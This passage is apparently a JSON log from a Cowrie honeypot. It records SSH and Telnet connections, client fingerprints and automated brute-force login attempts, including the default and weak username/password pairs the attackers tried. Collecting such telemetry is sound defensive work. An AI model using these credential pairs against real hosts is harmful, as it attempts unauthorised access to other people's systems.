{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:02:11.508013Z","src_ip":"103.217.145.104","session":"d8158e33519a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:02:12.972669Z","src_ip":"103.217.145.104","session":"d8158e33519a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:02:14.244940Z","src_ip":"103.217.145.104","session":"d8158e33519a"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":36544,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f3a47285aa3","protocol":"ssh","message":"New connection: 103.217.145.104:36544 (1.2.3.4:22) [session: 6f3a47285aa3]","sensor":"my-vps","timestamp":"2025-08-26T04:02:14.519834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:02:14.520574Z","src_ip":"103.217.145.104","session":"6f3a47285aa3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:02:14.790006Z","src_ip":"103.217.145.104","session":"6f3a47285aa3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:02:15.910420Z","src_ip":"103.217.145.104","session":"6f3a47285aa3"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:02:16.179915Z","src_ip":"103.217.145.104","session":"76865eb6cabe"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:02:16.180965Z","src_ip":"103.217.145.104","session":"6f3a47285aa3"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":55866,"dst_ip":"1.2.3.4","dst_port":22,"session":"cce1ff8a1600","protocol":"ssh","message":"New connection: 68.183.87.241:55866 (1.2.3.4:22) [session: cce1ff8a1600]","sensor":"my-vps","timestamp":"2025-08-26T04:02:19.942650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:02:19.943620Z","src_ip":"68.183.87.241","session":"cce1ff8a1600"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:02:20.208057Z","src_ip":"68.183.87.241","session":"cce1ff8a1600"}
{"eventid":"cowrie.login.failed","username":"louis","password":"louis","message":"login attempt [louis/louis] failed","sensor":"my-vps","timestamp":"2025-08-26T04:02:21.394774Z","src_ip":"68.183.87.241","session":"cce1ff8a1600"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:02:22.661784Z","src_ip":"68.183.87.241","session":"cce1ff8a1600"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50524,"dst_ip":"1.2.3.4","dst_port":22,"session":"be083f1c4d87","protocol":"ssh","message":"New connection: 212.227.235.229:50524 (1.2.3.4:22) [session: be083f1c4d87]","sensor":"my-vps","timestamp":"2025-08-26T04:03:23.084051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:03:23.084916Z","src_ip":"212.227.235.229","session":"be083f1c4d87"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:03:23.330525Z","src_ip":"212.227.235.229","session":"be083f1c4d87"}
{"eventid":"cowrie.session.connect","src_ip":"38.54.117.27","src_port":60594,"dst_ip":"1.2.3.4","dst_port":23,"session":"b2acad1e7a24","protocol":"telnet","message":"New connection: 38.54.117.27:60594 (1.2.3.4:23) [session: b2acad1e7a24]","sensor":"my-vps","timestamp":"2025-08-26T04:03:23.335534Z"}
{"eventid":"cowrie.login.failed","username":"mohamed","password":"12345","message":"login attempt [mohamed/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T04:03:24.951894Z","src_ip":"212.227.235.229","session":"be083f1c4d87"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:03:25.493126Z","src_ip":"38.54.117.27","session":"b2acad1e7a24"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:03:26.201235Z","src_ip":"212.227.235.229","session":"be083f1c4d87"}
{"eventid":"cowrie.session.closed","duration":4.619812965393066,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:03:27.955269Z","src_ip":"38.54.117.27","session":"b2acad1e7a24"}
{"eventid":"cowrie.session.connect","src_ip":"38.54.117.27","src_port":38650,"dst_ip":"1.2.3.4","dst_port":23,"session":"fb47ffca9e0c","protocol":"telnet","message":"New connection: 38.54.117.27:38650 (1.2.3.4:23) [session: fb47ffca9e0c]","sensor":"my-vps","timestamp":"2025-08-26T04:03:28.228825Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:03:30.038445Z","src_ip":"38.54.117.27","session":"fb47ffca9e0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:03:30.087965Z","src_ip":"38.54.117.27","session":"fb47ffca9e0c"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":53508,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e28508fff75","protocol":"ssh","message":"New connection: 68.183.87.241:53508 (1.2.3.4:22) [session: 6e28508fff75]","sensor":"my-vps","timestamp":"2025-08-26T04:03:31.839632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:03:31.840766Z","src_ip":"68.183.87.241","session":"6e28508fff75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:03:32.093341Z","src_ip":"68.183.87.241","session":"6e28508fff75"}
{"eventid":"cowrie.login.failed","username":"teamspeak","password":"root","message":"login attempt [teamspeak/root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:03:33.144264Z","src_ip":"68.183.87.241","session":"6e28508fff75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"3.4","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:03:33.508072Z","src_ip":"38.54.117.27","session":"fb47ffca9e0c"}
{"eventid":"cowrie.session.closed","duration":5.2856223583221436,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:03:33.514516Z","src_ip":"38.54.117.27","session":"fb47ffca9e0c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:03:34.398655Z","src_ip":"68.183.87.241","session":"6e28508fff75"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":40168,"dst_ip":"1.2.3.4","dst_port":22,"session":"419af14a7f42","protocol":"ssh","message":"New connection: 103.217.145.104:40168 (1.2.3.4:22) [session: 419af14a7f42]","sensor":"my-vps","timestamp":"2025-08-26T04:03:34.750366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:03:34.751482Z","src_ip":"103.217.145.104","session":"419af14a7f42"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:03:35.019205Z","src_ip":"103.217.145.104","session":"419af14a7f42"}
{"eventid":"cowrie.login.failed","username":"teamspeak","password":"root","message":"login attempt [teamspeak/root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:03:36.134788Z","src_ip":"103.217.145.104","session":"419af14a7f42"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:03:37.407052Z","src_ip":"103.217.145.104","session":"419af14a7f42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58142,"dst_ip":"1.2.3.4","dst_port":22,"session":"e07f705c984a","protocol":"ssh","message":"New connection: 212.227.235.229:58142 (1.2.3.4:22) [session: e07f705c984a]","sensor":"my-vps","timestamp":"2025-08-26T04:03:50.868576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:03:51.206120Z","src_ip":"212.227.235.229","session":"e07f705c984a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T04:03:51.207044Z","src_ip":"212.227.235.229","session":"e07f705c984a"}
{"eventid":"cowrie.login.success","username":"root","password":"balakirev","message":"login attempt [root/balakirev] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:03:54.706974Z","src_ip":"212.227.235.229","session":"e07f705c984a"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:03:55.879851Z","src_ip":"212.227.235.229","session":"e07f705c984a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57932,"dst_ip":"1.2.3.4","dst_port":22,"session":"94ad85fc01f3","protocol":"ssh","message":"New connection: 212.227.235.229:57932 (1.2.3.4:22) [session: 94ad85fc01f3]","sensor":"my-vps","timestamp":"2025-08-26T04:04:12.981667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:04:12.998295Z","src_ip":"212.227.235.229","session":"94ad85fc01f3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:04:13.550125Z","src_ip":"212.227.235.229","session":"94ad85fc01f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57940,"dst_ip":"1.2.3.4","dst_port":22,"session":"7167f5abecc6","protocol":"ssh","message":"New connection: 212.227.235.229:57940 (1.2.3.4:22) [session: 7167f5abecc6]","sensor":"my-vps","timestamp":"2025-08-26T04:04:14.528986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:04:14.559293Z","src_ip":"212.227.235.229","session":"7167f5abecc6"}
{"eventid":"cowrie.login.failed","username":"system","password":"OkwKcECs8qJP2Z","message":"login attempt [system/OkwKcECs8qJP2Z] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:14.662967Z","src_ip":"212.227.235.229","session":"94ad85fc01f3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"